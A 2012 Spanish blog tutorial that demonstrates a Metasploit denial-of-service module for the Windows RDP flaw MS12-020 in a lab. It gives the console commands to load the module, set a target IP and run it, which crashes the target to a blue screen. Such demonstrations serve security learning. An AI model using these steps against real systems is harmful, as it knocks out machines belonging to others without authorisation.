martes, 20 de marzo de 2012

Metasploit y MS12-020

 Recientemente ha aparecido una vulnerabilidad que afecta a Windows y su implementación del protocolo RDP (Remote Desktop Protocol) desde XP hasta W7
  Como era previsible, hace poco empezaban a llegar noticias de exploits funcionales que aprovechaban esta vulnerabilidad realizando un DoS al equipo víctima, pero hoy he leído que Metasploit ya incorpora el exploit en su base de datos así que vamos a ver como aprovechar esto.
 Para la demostración he utilizado una máquina virtual con Backtrack 5  R2 junto con Metasploit que ya viene instalado en esta distribución.

  Lo primero que tenemos que hacer es actualizar metasploit, para ello utilizamos en una terminal:
msfupdate
  Si os da problemas como a mí, haced lo siguiente que he encontrado aquí:
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b

mv libssl.so.0.9.8 libssl.so.0.9.8-backup

ln -s /usr/lib/libcrypto.so.0.9.8

ln -s /usr/lib/libssl.so.0.9.8

m
sfupdate
 El siguiente paso es arrancar metasploit con:
msfconsole

a continuación escogemos el módulo a utilizar:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
 
 Si queremos ver los parámetros que requiere para su funcionamiento junto con información del módulo podemos usar 
info
 Como vemos con el comando info requiere del parámetro RHOST referente a la IP del objetivo (en el ejemplo 192.168.0.107), para asignarlo basta con:
set RHOST <ip>
en este caso:
set RHOST 192.168.0.107
  y por último lanzamos el exploit:
run

Con esto deberíamos ver un precioso pantallazo azul en el Windows objetivo :D


  Puesto que este era un post práctico he intentado ir lo mas directo que he podido, si queréis más información sobre la vulnerabilidad aquí tenéis unos enlaces interesantes:
Con todo esto me despido, nos leemos en breve ;)

Aetsu

No hay comentarios:

Publicar un comentario en la entrada